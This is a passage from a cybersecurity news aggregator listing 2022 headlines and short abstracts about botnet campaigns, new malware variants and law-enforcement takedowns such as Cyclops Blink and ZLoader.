Researchers spotted a new evasive malware, tracked as KmsdBot, that infects systems via an SSH connection that uses weak credentials. Akamai Security Research discovered a new evasive Golang-based malware, tracked as KmsdBot, that infects systems...Security Affairs
November 09, 2022
Experts Warn of Browser Extensions Spying On Users via Cloud9 Chrome Botnet Network Full Text
Abstract
The Keksec threat actor has been linked to a previously undocumented malware strain, which has been observed in the wild masquerading as an extension for Chromium-based web browsers to enslave compromised machines into a botnet. Called Cloud9 by security firm Zimperium, the malicious browser add-on comes with a wide range of features that enables it to siphon cookies, log keystrokes, inject arbitrary JavaScript code, mine crypto, and even enlist the host to carry out DDoS attacks. The extension "not only steals the information available during the browser session but can also install malware on a user's device and subsequently assume control of the entire device," Zimperium researcher Nipun Gupta said in a new report. The JavaScript botnet isn't distributed via Chrome Web Store or Microsoft Edge Add-ons, but rather through fake executables and rogue websites disguised as Adobe Flash Player updates. Once installed, the extension is designed to inject a JavaScrThe Hacker News
November 08, 2022
Amadey Bot Spotted Deploying LockBit 3.0 Ransomware on Hacked Machines Full Text
Abstract
The Amadey malware is being used to deploy LockBit 3.0 ransomware on compromised systems, researchers have warned. "Amadey bot, the malware that is used to install LockBit, is being distributed through two methods: one using a malicious Word document file, and the other using an executable that takes the disguise of the Word file icon," AhnLab Security Emergency Response Center (ASEC) said in a new report published today. Amadey, first discovered in 2018, is a "criminal-to-criminal (C2C) botnet infostealer project," as described by the BlackBerry Research and Intelligence Team, and is offered for purchase on the criminal underground for as much as $600. While its primary function is to harvest sensitive information from the infected hosts, it further doubles up as a channel to deliver next-stage artifacts. Earlier this July, it was spread using SmokeLoader, a malware with not-so-different features like itself. Just last month, ASEC also found the malThe Hacker News
November 02, 2022
Emotet botnet starts blasting malware again after 4 month break Full Text
Abstract
The Emotet malware operation is again spamming malicious emails after almost a four-month "vacation" that saw little activity from the notorious cybercrime operation.BleepingComputer
November 02, 2022
Emotet botnet starts blasting malware again after 5 month break Full Text
Abstract
The Emotet malware operation is again spamming malicious emails after almost a five-month "vacation" that saw little activity from the notorious cybercrime operation.BleepingComputer
October 25, 2022
Emotet Botnet Drops Malware via Self-Unlocking Password-Protected RAR Files Full Text
Abstract
In an attack chain detected by Trustwave SpiderLabs researchers, an invoice-themed ZIP file lure was found to contain a nested self-extracting (SFX) archive, with the first archive having the purpose to launch the second.Heimdal Security
October 21, 2022
Emotet Botnet Distributing Self-Unlocking Password-Protected RAR Files to Drop Malware Full Text
Abstract
The notorious Emotet botnet has been linked to a new wave of malspam campaigns that take advantage of password-protected archive files to drop CoinMiner and Quasar RAT on compromised systems. In an attack chain detected by Trustwave SpiderLabs researchers, an invoice-themed ZIP file lure was found to contain a nested self-extracting (SFX) archive, the first archive acting as a conduit to launch the second. While phishing attacks like these traditionally require persuading the target into opening the attachment, the cybersecurity company said the campaign sidesteps this hurdle by making use of a batch file to automatically supply the password to unlock the payload. The first SFX archive file further makes use of either a PDF or Excel icon to make it appear legitimate, when, in reality, it contains three components: the password-protected second SFX RAR file, the aforementioned batch script which launches the archive, and a decoy PDF or image. "The execution of the batch fThe Hacker News
October 14, 2022
Mirai Botnet Hits Wynncraft Minecraft Server with 2.5 Tbps DDoS Attack Full Text
Abstract
Web infrastructure and security company Cloudflare disclosed this week that it halted a 2.5 Tbps distributed denial-of-service (DDoS) attack launched by a Mirai botnet. Characterizing it as a "multi-vector attack consisting of UDP and TCP floods," researcher Omer Yoachimik said the DDoS attack targeted the Minecraft server Wynncraft in Q3 2022. "The entire 2.5 Tbps attack lasted about 2 minutes, and the peak of the 26 million rps attack [was] only 15 seconds," Yoachimik noted. "This is the largest attack we've ever seen from the bitrate perspective." Cloudflare also pointed to a surge in multi-terabit DDoS attacks as well as longer-lasting volumetric attacks during the time period, not to mention an uptick in attacks targeting Taiwan and Japan. The disclosure comes almost 10 months after Microsoft said it thwarted a record-breaking 3.47 Tbps DDoS attack in November 2021 directed against an unnamed Azure customer in Asia. Other DDoS attacksThe Hacker News
October 12, 2022
PseudoManuscrypt Botnet Evolves to Infect More Systems Full Text
Abstract
The relatively new PseudoManuscrypt botnet made some changes to its C2 infrastructure that enabled the threat actors to infect nearly 500,000 systems across 40 countries in the past eight months. Previously, Kaspersky had reported a similar technique being used by different malware families such as So ... Read MoreCyware Alerts - Hacker News
September 19, 2022
Emotet Botnet Started Distributing Quantum and BlackCat Ransomware Full Text
Abstract
The Emotet malware is now being leveraged by ransomware-as-a-service (RaaS) groups, including Quantum and BlackCat, after Conti's official retirement from the threat landscape this year. Emotet started off as a banking trojan in 2014, but updates added to it over time have transformed the malware into a highly potent threat that's capable of downloading other payloads onto the victim's machine, which would allow the attacker to control it remotely. Although the infrastructure associated with the invasive malware loader was taken down as part of a law enforcement effort in January 2021, the Conti ransomware cartel is said to have played an instrumental role in its comeback late last year. "From November 2021 to Conti's dissolution in June 2022, Emotet was an exclusive Conti ransomware tool, however, the Emotet infection chain is currently attributed to Quantum and BlackCat," AdvIntel said in an advisory published last week. Typical attack sequencesThe Hacker News
September 19, 2022
How botnet attacks work and how to defend against them Full Text
Abstract
Experts believe that the development of serverless technologies will further simplify the creation of botnets for DDoS attacks. Here's how Gcore can counter these threats.BleepingComputer
September 17, 2022
Emotet botnet now pushes Quantum and BlackCat ransomware Full Text
Abstract
While monitoring the Emotet botnet's current activity, security researchers found that the malware is now being used by the Quantum and BlackCat ransomware gang to deploy their payloads.BleepingComputer
September 12, 2022
Bad bots are coming at APIs! How to beat the API bot attacks? Full Text
Abstract
75% of login attempts from Application Programming Interface (API) endpoints are malicious – according to perimeterx. Hackers systematically use bots for malicious login attempts.Help Net Security
September 07, 2022
Ukraine dismantles more bot farms spreading Russian disinformation Full Text
Abstract
The Cyber Department of the Ukrainian Security Service (SSU) dismantled two more bot farms that spread Russian disinformation on social networks and messaging platforms via thousands of fake accounts.BleepingComputer
September 7, 2022
Moobot botnet is back and targets vulnerable D-Link routers Full Text
Abstract
The Moobot botnet is behind a new wave of attacks that started in early August and that target vulnerable D-Link routers. Palo Alto Network’s Unit 42 researchers reported a new wave of attacks launched by the Moobot botnet that target vulnerable...Security Affairs
September 07, 2022
Mirai Variant MooBot Botnet Exploiting D-Link Router Vulnerabilities Full Text
Abstract
A variant of the Mirai botnet known as MooBot is co-opting vulnerable D-Link devices into an army of denial-of-service bots by taking advantage of multiple exploits. "If the devices are compromised, they will be fully controlled by attackers, who could utilize those devices to conduct further attacks such as distributed denial-of-service (DDoS) attacks," Palo Alto Networks Unit 42 said in a Tuesday report. MooBot, first disclosed by Qihoo 360's Netlab team in September 2019, has previously targeted LILIN digital video recorders and Hikvision video surveillance products to expand its network. In the latest wave of attacks discovered by Unit 42 in early August 2022, as many as four different flaws in D-Link devices, both old and new, have paved the way for the deployment of MooBot samples. These include - CVE-2015-2051 (CVSS score: 10.0) - D-Link HNAP SOAPAction Header Command Execution Vulnerability CVE-2018-6530 (CVSS score: 9.8) - D-Link SOAP Interface ReThe Hacker News
September 06, 2022
Moobot botnet is coming for your unpatched D-Link router Full Text
Abstract
The Mirai malware botnet variant known as 'MooBot' has re-emerged in a new attack wave that started early last month, targeting vulnerable D-Link routers with a mix of old and new exploits.BleepingComputer
August 08, 2022
New Orchard Botnet Uses Bitcoin Founder’s Account Info to Generate Malicious Domains Full Text
Abstract
A new botnet named Orchard has been observed using Bitcoin creator Satoshi Nakamoto's account transaction information to generate domain names to conceal its command-and-control (C2) infrastructure. "Because of the uncertainty of Bitcoin transactions, this technique is more unpredictable than using the common time-generated [domain generation algorithms], and thus more difficult to defend against," researchers from Qihoo 360's Netlab security team said in a Friday write-up. Orchard is said to have undergone three revisions since February 2021, with the botnet primarily used to deploy additional payloads onto a victim's machine and execute commands received from the C2 server. It's also designed to upload device and user information as well as infect USB storage devices to propagate the malware. Netlab's analysis shows that over 3,000 hosts have been enslaved by the malware to date, most of them located in China. Orchard has also been subjected toThe Hacker News
August 8, 2022
Orchard botnet uses Bitcoin Transaction info to generate DGA domains Full Text
Abstract
Experts spotted a new botnet named Orchard using Bitcoin creator Satoshi Nakamoto's account information to generate malicious domains. 360 Netlab researchers recently discovered a new botnet named Orchard that uses Satoshi Nakamoto's Bitcoin account...Security Affairs
August 5, 2022
New Linux botnet RapperBot brute-forces SSH servers Full Text
Abstract
RapperBot is a new botnet employed in attacks since mid-June 2022 that targets Linux SSH servers with brute-force attacks. Researchers from FortiGuard Labs have discovered a new IoT botnet tracked as RapperBot which has been active since mid-June 2022....Security Affairs
July 26, 2022
IoT Botnets Fuels DDoS Attacks – Are You Prepared? Full Text
Abstract
The increased proliferation of IoT devices paved the way for the rise of IoT botnets that amplify DDoS attacks today. This is a dangerous warning: the possibility of a sophisticated DDoS attack and a prolonged service outage will prevent businesses from growing.Threatpost
July 21, 2022
8220 Gang: A Group With Botnet of 30,000 Hosts Full Text
Abstract
8220 Gang, a cryptomining gang, has been exploiting Linux and cloud app vulnerabilities to grow their botnet network to more than 30,000 infected hosts. The low-skilled 8220 Gang is financially-motivated and targets Aliyun, AWS, QCloud, GCP, and Azure hosts. Botnet attacks can be controll ... Read MoreCyware Alerts - Hacker News
July 21, 2022
8220 Gang Cloud Botnet infected 30,000 host globally Full Text
Abstract
The crimeware group known as 8220 Gang expanded their Cloud Botnet to roughly 30,000 hosts globally over the last month. Researchers from SentinelOne reported that the low-skill crimeware 8220 Gang has expanded their Cloud Botnet over the last month...Security Affairs
July 20, 2022
This Cloud Botnet Has Hijacked 30,000 Systems to Mine Cryptocurrencies Full Text
Abstract
The 8220 cryptomining group has expanded in size to encompass as many as 30,000 infected hosts, up from 2,000 hosts globally in mid-2021. "8220 Gang is one of the many low-skill crimeware gangs we continually observe infecting cloud hosts and operating a botnet and cryptocurrency miners through known vulnerabilities and remote access brute forcing infection vectors," Tom Hegel of SentinelOne said in a Monday report. The growth is said to have been fueled through the use of Linux and common cloud application vulnerabilities and poorly secured configurations for services such as Docker, Apache WebLogic, and Redis. Active since early 2017, the Chinese-speaking, Monero-mining threat actor was most recently seen targeting i686 and x86_64 Linux systems by means of weaponizing a recent remote code execution exploit for Atlassian Confluence Server (CVE-2022-26134) to drop the PwnRig miner payload. "Victims are not targeted geographically, but simply identified by theiThe Hacker News
July 19, 2022
Hacking group ‘8220’ grows cloud botnet to more than 30,000 hosts Full Text
Abstract
A cryptomining gang known as 8220 Gang has been exploiting Linux and cloud app vulnerabilities to grow their botnet to more than 30,000 infected hosts.BleepingComputer
July 19, 2022
Sality Botnet Evolves to Target Industrial Control Systems Full Text
Abstract
A threat actor is infecting ICS to create a botnet through password cracking software for unlocking Programmable Logic Controllers (PLCs) and Human Machine Interface (HMI) terminals.Cyware Alerts - Hacker News
July 16, 2022
Tiny Mantis Botnet Can Launch More Powerful DDoS Attacks Than Mirai Full Text
Abstract
According to the Cloudflare content distribution network, a botnet named Mantis is so powerful that it has launched the biggest DDoS attacks ever seen. The botnet has thus far targeted around 1,000 Cloudflare customers within the past few weeks.Hackread
July 15, 2022
Tainted password-cracking software for industrial systems used to spread P2P Sality bot Full Text
Abstract
Dragos researchers uncovered a small-scale campaign targeting industrial engineers and operators with Sality malware. During a routine vulnerability assessment, Dragos researchers discovered a campaign targeting industrial engineers and operators...Security Affairs
July 15, 2022
Tiny ‘Mantis’ Botnet Launching the Most Powerful DDoS Attacks Yet Full Text
Abstract
The botnet – which Cloudflare calls Mantis and which is named after the small, razor-legged prawn – generated a short but record-breaking DDoS attack in June that peaked at 26 million HTTPS requests per second (rps).ZDNet
July 14, 2022
Mantis botnet behind the record-breaking DDoS attack in June Full Text
Abstract
The record-breaking distributed denial-of-service (DDoS) attack that Cloudflare mitigated last month originated from a new botnet called Mantis, which is currently described as "the most powerful botnet to date."BleepingComputer
June 29, 2022
The Link Between AWM Proxy & the Glupteba Botnet – Krebs on Security Full Text
Abstract
Despite all of the disruption caused by Google’s legal and technical meddling, AWM is still around and nearly as healthy as ever, although the service has been rebranded with a new name and there are dubious claims of new owners.Krebs on Security
June 28, 2022
Scalper Bots Leave the Israeli Government Helpless Full Text
Abstract
Scalper bots have gone out of control in Israel by signing up for public service appointments for several government services and then selling them to dissatisfied citizens. The bot's operators attempted to sell appointments for multiple government agencies for over $100. In order to beat mo ... Read MoreCyware Alerts - Hacker News
June 23, 2022
Scalper bots out of control in Israel, selling state appointments Full Text
Abstract
Out-of-control scalper bots have created havoc in Israel by registering public service appointments for various government services and then offering to sell them to disgruntled citizens.BleepingComputer
June 18, 2022
US DoJ announced to have shut down the Russian RSOCKS Botnet Full Text
Abstract
The U.S. Department of Justice (DoJ) announced to have shut down the infrastructure associated with the Russian botnet RSOCKS...Security Affairs
June 17, 2022
Authorities Shut Down Russian RSOCKS Botnet That Hacked Millions of Devices Full Text
Abstract
The U.S. Department of Justice (DoJ) on Thursday disclosed that it took down the infrastructure associated with a Russian botnet known as RSOCKS in collaboration with law enforcement partners in Germany, the Netherlands, and the U.K. The botnet, operated by a sophisticated cybercrime organization, is believed to have ensnared millions of internet-connected devices, including Internet of Things (IoT) devices, Android phones, and computers for use as a proxy service. Botnets, a constantly evolving threat, are networks of hijacked computer devices that are under the control of a single attacking party and are used to facilitate a variety of large-scale cyber intrusions such as distributed denial-of-service (DDoS) attacks, email spam, and cryptojacking. "The RSOCKS botnet offered its clients access to IP addresses assigned to devices that had been hacked," the DoJ said in a press release. "The owners of these devices did not give the RSOCKS operator(s) authority to acThe Hacker News
June 17, 2022
Russian RSocks botnet disrupted after hacking millions of devices Full Text
Abstract
The U.S. Department of Justice has announced the disruption of the Russian RSocks malware botnet used to hijack millions of computers, Android smartphones, and IoT (Internet of Things) devices worldwide for use as proxy servers.BleepingComputer
June 15, 2022
Panchan: A New Golang-based Peer-To-Peer Botnet Targeting Linux Servers Full Text
Abstract
A new Golang-based peer-to-peer (P2P) botnet has been spotted actively targeting Linux servers in the education sector since its emergence in March 2022. Dubbed Panchan by Akamai Security Research, the malware "utilizes its built-in concurrency features to maximize spreadability and execute malware modules" and "harvests SSH keys to perform lateral movement." The feature-packed botnet, which relies on a basic list of default SSH passwords to carry out a dictionary attack and expand its reach, primarily functions as a cryptojacker designed to hijack a computer's resources to mine cryptocurrencies. The cybersecurity and cloud service company noted it first spotted Panchan's activity on March 19, 2022, and attributed the malware to a likely Japanese threat actor based on the language used in the administrative panel baked into the binary to edit the mining configuration. Panchan is known to deploy and execute two miners, XMRig and nbhash, on the hostThe Hacker News
June 15, 2022
Panchan Golang P2P botnet targeting Linux servers in cryptomining campaign Full Text
Abstract
Researchers discovered a new Golang-based peer-to-peer (P2P) botnet, dubbed Panchan, targeting Linux servers in the education sector since March 2022. Akamai security researchers discovered a new Golang-based P2P Botnet, tracked as Panchan, that...Security Affairs
June 15, 2022
New peer-to-peer botnet infects Linux servers with cryptominers Full Text
Abstract
A new peer-to-peer botnet named Panchan appeared in the wild around March 2022, targeting Linux servers in the education sector to mine cryptocurrency.BleepingComputer
June 08, 2022
Linux botnets now exploit critical Atlassian Confluence bug Full Text
Abstract
Several botnets are now using exploits targeting a critical remote code execution (RCE) vulnerability to infect Linux servers running unpatched Atlassian Confluence Server and Data Center installs.BleepingComputer
June 3, 2022
Clipminer Botnet already allowed operators to make at least $1.7 Million Full Text
Abstract
The Clipminer botnet allowed operators to earn at least $1.7 million, according to a report published by security researchers at Symantec. Researchers at Symantec’s Threat Hunter Team uncovered a cryptomining operation that has potentially made...Security Affairs
June 1, 2022
New XLoader Botnet version uses new techniques to obscure its C2 servers Full Text
Abstract
A new version of the XLoader botnet is implementing a new technique to obscure the Command and Control infrastructure. Researchers from Check Point have discovered a new version of the XLoader botnet, which implements significant enhancements, such...Security Affairs
June 1, 2022
EnemyBot Botnet Expanding its Scope by Targeting Latest Vulnerabilities Full Text
Abstract
EnemyBot botnet expanded its attack scope to exploit critical vulnerabilities found in VMware, Android, and F5 BIG-IP. It is suspected to have some strong correlation with the LolFMe botnet in terms of having similar strings, structure, and patterns in the code. The botnet is under active developme ... Read MoreCyware Alerts - Hacker News
June 01, 2022
New XLoader Botnet Version Using Probability Theory to Hide its C&C Servers Full Text
Abstract
An enhanced version of the XLoader malware has been spotted adopting a probability-based approach to camouflage its command-and-control (C&C) infrastructure, according to the latest research. "Now it is significantly harder to separate the wheat from the chaff and discover the real C&C servers among thousands of legitimate domains used by Xloader as a smokescreen," Israeli cybersecurity company Check Point said. First spotted in the wild in October 2020, XLoader is a successor to Formbook and a cross-platform information stealer that's capable of plundering credentials from web browsers, capturing keystrokes and screenshots, and executing arbitrary commands and payloads. More recently, the ongoing geopolitical conflict between Russia and Ukraine has proved to be a lucrative fodder for distributing XLoader by means of phishing emails aimed at high-ranking government officials in Ukraine. The latest findings from Check Point build on a previous reporThe Hacker News
May 31, 2022
New XLoader botnet uses probability theory to hide its servers Full Text
Abstract
Threat analysts have spotted a new version of the XLoader botnet malware that uses probability theory to hide its command and control servers, making it difficult to disrupt the malware's operation.BleepingComputer
May 30, 2022
EnemyBot Linux Botnet Now Exploits Web Server, Android and CMS Vulnerabilities Full Text
Abstract
A nascent Linux-based botnet named Enemybot has expanded its capabilities to include recently disclosed security vulnerabilities in its arsenal to target web servers, Android devices, and content management systems (CMS). "The malware is rapidly adopting one-day vulnerabilities as part of its exploitation capabilities," AT&T Alien Labs said in a technical write-up published last week. "Services such as VMware Workspace ONE, Adobe ColdFusion, WordPress, PHP Scriptcase and more are being targeted as well as IoT and Android devices." First disclosed by Securonix in March and later by Fortinet, Enemybot has been linked to a threat actor tracked as Keksec (aka Kek Security, Necro, and FreakOut), with early attacks targeting routers from Seowon Intech, D-Link, and iRZ. Enemybot, which is capable of carrying out DDoS attacks, draws its origins from several other botnets like Mirai, Qbot, Zbot, Gafgyt, and LolFMe. An analysis of the latest variant revealsThe Hacker News
May 23, 2022
Russia-linked Fronton botnet could run disinformation campaigns
Abstract
Researchers warn that the Fronton botnet was used by Russia-linked threat actors for coordinated disinformation campaigns. Fronton is a distributed denial-of-service (DDoS) botnet that was used by Russia-linked threat actors for coordinated disinformation...
Source: Security Affairs
May 19, 2022
Russia-linked Fronton Botnet Goes Beyond Just DDoS attacks at Scale
Abstract
An investigation into the Fronton botnet has revealed far more than the ability to perform DDoS attacks, with the exposure of coordinated inauthentic behavior "on a massive scale."
Source: ZDNet
May 17, 2022
New Sysrv Botnet Variant Hijacking Windows and Linux with Crypto Miners
Abstract
Microsoft is warning of a new variant of the Sysrv botnet that's exploiting multiple security flaws in web applications and databases to install coin miners on both Windows and Linux systems. The tech giant, which has called the new version Sysrv-K, is said to weaponize an array of exploits to gain control of web servers. The cryptojacking botnet first emerged in December 2020. "Sysrv-K scans the internet to find web servers with various vulnerabilities to install itself," the company said in a series of tweets. "The vulnerabilities range from path traversal and remote file disclosure to arbitrary file download and remote code execution vulnerabilities." This also includes CVE-2022-22947 (CVSS score: 10.0), a code injection vulnerability in Spring Cloud Gateway that could be exploited to allow arbitrary remote execution on a remote host via a maliciously crafted request. It's worth noting that the abuse of CVE-2022-22947 has prompted the U.S. Cyb...
Source: The Hacker News
May 15, 2022
Sysrv-K, a new variant of the Sysrv botnet includes new exploits
Abstract
Microsoft reported that the Sysrv botnet is targeting Windows and Linux servers exploiting flaws in the Spring Framework and WordPress. Microsoft Security Intelligence team Microsoft reported that a new variant of the Sysrv botnet,...
Source: Security Affairs
May 13, 2022
Microsoft: Sysrv botnet targets Windows, Linux servers with new exploits
Abstract
Microsoft says the Sysrv botnet is now exploiting vulnerabilities in the Spring Framework and WordPress to ensnare and deploy cryptomining malware on vulnerable Windows and Linux servers.
Source: BleepingComputer
May 13, 2022
FluBot Spreads via SMS Campaigns to Target Finnish People
Abstract
The NCSC-FI issued a warning about increased FluBot activities. Now, it has gone beyond Android to target iPhone users via a new campaign that uses SMS and MMS. These SMS messages contain links to voicemail, missed call notifications, or alerts about incoming money from an unknown financial transac...
Source: Cyware Alerts - Hacker News
April 26, 2022
Emotet Testing New Delivery Ideas After Microsoft Disables VBA Macros by Default
Abstract
The threat actor behind the prolific Emotet botnet is testing new attack methods on a small scale before co-opting them into their larger volume malspam campaigns, potentially in response to Microsoft's move to disable Visual Basic for Applications (VBA) macros by default across its products. Calling the new activity a "departure" from the group's typical behavior, Proofpoint alternatively raised the possibility that the latest set of phishing emails distributing the malware show that the operators are now "engaged in more selective and limited attacks in parallel to the typical massive scale email campaigns." Emotet, the handiwork of a cybercrime group tracked as TA542 (aka Mummy Spider or Gold Crestwood), staged a revival of sorts late last year after a 10-month-long hiatus following a coordinated law enforcement operation to take down its attack infrastructure. Since then, Emotet campaigns have targeted thousands of customers with tens of...
Source: The Hacker News
April 22, 2022
Android Bianlian Botnet Tries to Bypass Photo TAN Authentication Used for Mobile Banking
Abstract
The Android malware typically poses as a video player, Google Play app, or a mobile banking application. Once installed, it asks the victim to activate Accessibility Services for the app to "work correctly."
Source: Fortinet
April 22, 2022
Lemon_Duck cryptomining botnet targets Docker servers
Abstract
The Lemon_Duck cryptomining botnet is targeting Docker servers to mine cryptocurrency on Linux systems. CrowdStrike researchers reported that the Lemon_Duck cryptomining botnet is targeting Docker to mine cryptocurrency on Linux systems....
Source: Security Affairs
April 20, 2022
BotenaGo's New Avatar Targets Lilin DVR Devices
Abstract
In October 2021, the source code of BotenaGo was leaked, leading to the creation of newer variants based on the original. Since then, researchers have observed various variants of BotenaGo.
Source: Cyware Alerts - Hacker News
April 19, 2022
Emotet botnet switches to 64-bit modules, increases activity
Abstract
The Emotet malware is having a burst in distribution and is likely to soon switch to new payloads that are currently detected by fewer antivirus engines.
Source: BleepingComputer
April 17, 2022
Enemybot, a new DDoS botnet appears in the threat landscape
Abstract
Enemybot is a DDoS botnet that targeted several routers and web servers by exploiting known vulnerabilities. Researchers from Fortinet discovered a new DDoS botnet, tracked as Enemybot, that has targeted several routers and web servers by exploiting...
Source: Security Affairs
April 14, 2022
New EnemyBot DDoS Botnet Borrows Exploit Code from Mirai and Gafgyt
Abstract
A threat group that pursues crypto mining and distributed denial-of-service (DDoS) attacks has been linked to a new botnet called Enemybot, which has been discovered enslaving routers and Internet of Things (IoT) devices since last month. "This botnet is mainly derived from Gafgyt's source code but has been observed to borrow several modules from Mirai's original source code," Fortinet FortiGuard Labs said in a report this week. The botnet has been attributed to an actor named Keksec (aka Kek Security, Necro, and FreakOut), which has been linked to multiple botnets such as Simps, Ryuk (not to be confused with the ransomware of the same name), and Samael, and has a history of targeting cloud infrastructure to carry out crypto mining and DDoS operations. Primarily targeting routers from Seowon Intech, D-Link, and iRZ to propagate its infections and grow in volume, an analysis of the malware specimen has highlighted Enemybot's obfuscation attempt...
Source: The Hacker News
April 14, 2022
Microsoft Disrupts ZLoader Cybercrime Botnet in Global Operation
Abstract
Microsoft and a consortium of cybersecurity companies took legal and technical steps to disrupt the ZLoader botnet, seizing control of 65 domains that were used to control and communicate with the infected hosts. "ZLoader is made up of computing devices in businesses, hospitals, schools, and homes around the world and is run by a global internet-based organized crime gang operating malware as a service that is designed to steal and extort money," Amy Hogan-Burney, general manager of Microsoft's Digital Crimes Unit (DCU), said. The operation, Microsoft said, was undertaken in collaboration with ESET, Lumen's Black Lotus Labs, Palo Alto Networks Unit 42, Avast, Financial Services Information Sharing and Analysis Center (FS-ISAC), and Health Information Sharing and Analysis Center (H-ISAC). As a result of the disruption, the domains are now redirected to a sinkhole, effectively preventing the botnet's criminal operators from contacting the compromised devices.
Source: The Hacker News
April 14, 2022
Microsoft has taken legal and technical action to dismantle the Zloader botnet
Abstract
Microsoft's Digital Crimes Unit (DCU) announced that it has shut down dozens of C2 servers used by the infamous ZLoader botnet. Microsoft dismantled the C2 infrastructure used by the ZLoader trojan with the help of telecommunications providers around the world...
Source: Security Affairs
April 13, 2022
New Fodcha DDoS botnet targets over 100 victims every day
Abstract
A rapidly growing botnet is ensnaring routers, DVRs, and servers across the Internet to target more than 100 victims every day in distributed denial-of-service (DDoS) attacks.
Source: BleepingComputer
April 12, 2022
SharkBot Propagates via Fake Antivirus Apps on Google Play
Abstract
Check Point researchers discovered seven malicious apps on the Google Play Store posing as antivirus solutions to drop the SharkBot banking trojan. These malicious apps were downloaded more than 15,000 times before Google removed them. Researchers advise downloading apps only from trusted/verified...
Source: Cyware Alerts - Hacker News
April 11, 2022
Russia-linked Cyclops Blink Botnet Taken Down
Abstract
The FBI announced taking down the Cyclops Blink botnet, which used to target firewall appliances and SOHO networking devices. It was under the control of the Russian Sandworm group. The operation's initial court authorization was given on March 18, the botnet infection was fully removed from all id...
Source: Cyware Alerts - Hacker News
April 11, 2022
Analyzing the Exploitation of Spring4Shell Vulnerability in Weaponizing and Executing the Mirai Botnet Malware
Abstract
Trend Micro Threat Research observed active exploitation of the Spring4Shell vulnerability assigned as CVE-2022-22965, which allows malicious actors to weaponize and execute the Mirai botnet malware.
Source: Trend Micro
April 08, 2022
Hackers Exploiting Spring4Shell Vulnerability to Deploy Mirai Botnet Malware
Abstract
The recently disclosed critical Spring4Shell vulnerability is being actively exploited by threat actors to execute the Mirai botnet malware, particularly in the Singapore region since the start of April 2022. "The exploitation allows threat actors to download the Mirai sample to the '/tmp' folder and execute them after permission change using 'chmod,'" Trend Micro researchers Deep Patel, Nitesh Surana, Ashish Verma said in a report published Friday. Tracked as CVE-2022-22965 (CVSS score: 9.8), the vulnerability could allow malicious actors to achieve remote code execution in Spring Core applications under non-default circumstances, granting the attackers full control over the compromised devices. The development comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) earlier this week added the Spring4Shell vulnerability to its Known Exploited Vulnerabilities Catalog based on "evidence of active exploitation." This is...
Source: The Hacker News
April 07, 2022
FBI Shut Down Russia-linked "Cyclops Blink" Botnet That Infected Thousands of Devices
Abstract
The U.S. Department of Justice (DoJ) announced that it neutralized Cyclops Blink, a modular botnet controlled by a threat actor known as Sandworm, which has been attributed to the Main Intelligence Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU). "The operation copied and removed malware from vulnerable internet-connected firewall devices that Sandworm used for command-and-control (C2) of the underlying botnet," the DoJ said in a statement Wednesday. In addition to disrupting its C2 infrastructure, the operation also closed the external management ports that the threat actor used to establish connections with the firewall appliances, effectively severing contact and preventing the hacking group from using the infected devices to commandeer the botnet. The March 22 court-authorized disruption of Cyclops Blink comes a little over a month after intelligence agencies in the U.K. and the U.S. described the botnet as a replacement fram...
Source: The Hacker News
April 6, 2022
US dismantled the Russia-linked Cyclops Blink botnet
Abstract
The U.S. government announced the disruption of the Cyclops Blink botnet operated by the Russia-linked Sandworm APT group. The U.S. government announced that it had dismantled the Cyclops Blink botnet operated by the Russia-linked Sandworm APT group....
Source: Security Affairs
April 06, 2022
US disrupts Russian Cyclops Blink botnet before it could be used in attacks
Abstract
US government officials announced today the disruption of the Cyclops Blink botnet controlled by the Russian-backed Sandworm hacking group before it could be used in attacks.
Source: BleepingComputer
April 5, 2022
Beastmode Botnet Adds New Exploits to its Arsenal
Abstract
According to Fortinet, BeastMode attempts to infect TOTOLINK routers by exploiting several vulnerabilities. The threat actors added the exploits just a week after the PoCs were publicly released on GitHub.
Source: Cyware Alerts - Hacker News
April 2, 2022
Beastmode Mirai botnet now includes exploits for Totolink routers
Abstract
Operators behind the Mirai-based distributed denial-of-service (DDoS) botnet Beastmode (aka B3astmode) added exploits for Totolink routers. The Mirai-based distributed denial-of-service (DDoS) botnet Beastmode (aka B3astmode) now includes exploits...
Source: Security Affairs
April 01, 2022
Beastmode botnet boosts DDoS power with new router exploits
Abstract
A Mirai-based distributed denial-of-service (DDoS) botnet tracked as Beastmode (aka B3astmode) has updated its list of exploits to include several new ones, three of them targeting various models of Totolink routers.
Source: BleepingComputer
March 30, 2022
Muhstik Botnet Gang Targets Redis Exploit Within One Day of Public POC Release
Abstract
Muhstik botnet operators were found exploiting a recently disclosed bug in some Redis Debian packages to infiltrate servers and then use them for DDoS attacks. The attackers target the vulnerability CVE-2022-0543 in Redis Debian packages. To protect against this particular attack, users are recommend...
Source: Cyware Alerts - Hacker News
March 28, 2022
Muhstik Botnet Targeting Redis Servers Using Recently Disclosed Vulnerability
Abstract
The Muhstik botnet has been observed targeting Redis servers exploiting the recently disclosed CVE-2022-0543 vulnerability. Muhstik is a botnet that is known to use web application exploits to compromise IoT devices, it has been around for at least...
Source: Security Affairs
March 27, 2022
Muhstik Botnet Targeting Redis Servers Using Recently Disclosed Vulnerability
Abstract
Muhstik, a botnet infamous for propagating via web application exploits, has been observed targeting Redis servers using a recently disclosed vulnerability in the database system. The vulnerability relates to CVE-2022-0543, a Lua sandbox escape flaw in the open-source, in-memory, key-value data store that could be abused to achieve remote code execution on the underlying machine. The vulnerability is rated 10 out of 10 for severity. "Due to a packaging issue, a remote attacker with the ability to execute arbitrary Lua scripts could possibly escape the Lua sandbox and execute arbitrary code on the host," Ubuntu noted in an advisory released last month. According to telemetry data gathered by Juniper Threat Labs, the attacks leveraging the new flaw are said to have commenced on March 11, 2022, leading to the retrieval of a malicious shell script ("russia.sh") from a remote server, which is then utilized to fetch and execute the botnet binaries from another s...
Source: The Hacker News
March 23, 2022
Over 200,000 MikroTik Routers Worldwide Are Under the Control of Botnet Malware
Abstract
